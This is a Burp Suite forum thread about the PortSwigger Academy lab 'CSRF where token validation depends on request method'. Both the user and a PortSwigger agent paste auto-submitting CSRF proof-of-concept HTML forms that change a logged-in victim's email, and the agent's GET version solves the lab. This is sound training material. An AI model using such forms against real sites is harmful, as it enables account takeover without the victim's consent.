Burp Suite User Forum

Create new post

solved the lab and not appearing as solved

Malek | Last updated: Oct 01, 2024 06:16PM UTC

I tried everything and it is not working i even tried chrome and firefox both are not working LAB:CSRF where token validation depends on request method my code : <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <form action="https://0ae700ed035a4ad680378079006900c1.web-security-academy.net/my-account/change-email" method="POST"> <input type="hidden" name="email" value="Hacker@gmail.com" /> <input type="hidden" name="csrf" value="2PsbBOK7XVqG8kxGucPmtoPSqpd8bZP8" /> <input type="submit" value="Submit request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body> </html>

Ben, PortSwigger Agent | Last updated: Oct 02, 2024 10:20AM UTC

Hi Malek, You do not appear to have changed the POST request to a GET request and then used the CSRF PoC functionality. For what it is worth, the following payload allows me to solve this lab: <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <form action="https://0a36000604cbe09885b0273600be00ce.web-security-academy.net/my-account/change-email"> <input type="hidden" name="email" value="test7&#64;hotmail&#46;com" /> <input type="hidden" name="csrf" value="TwNYVxiqyaeoGDCnbU2EXNBGw3XMUTw6" /> <input type="submit" value="Submit request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body> </html>

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.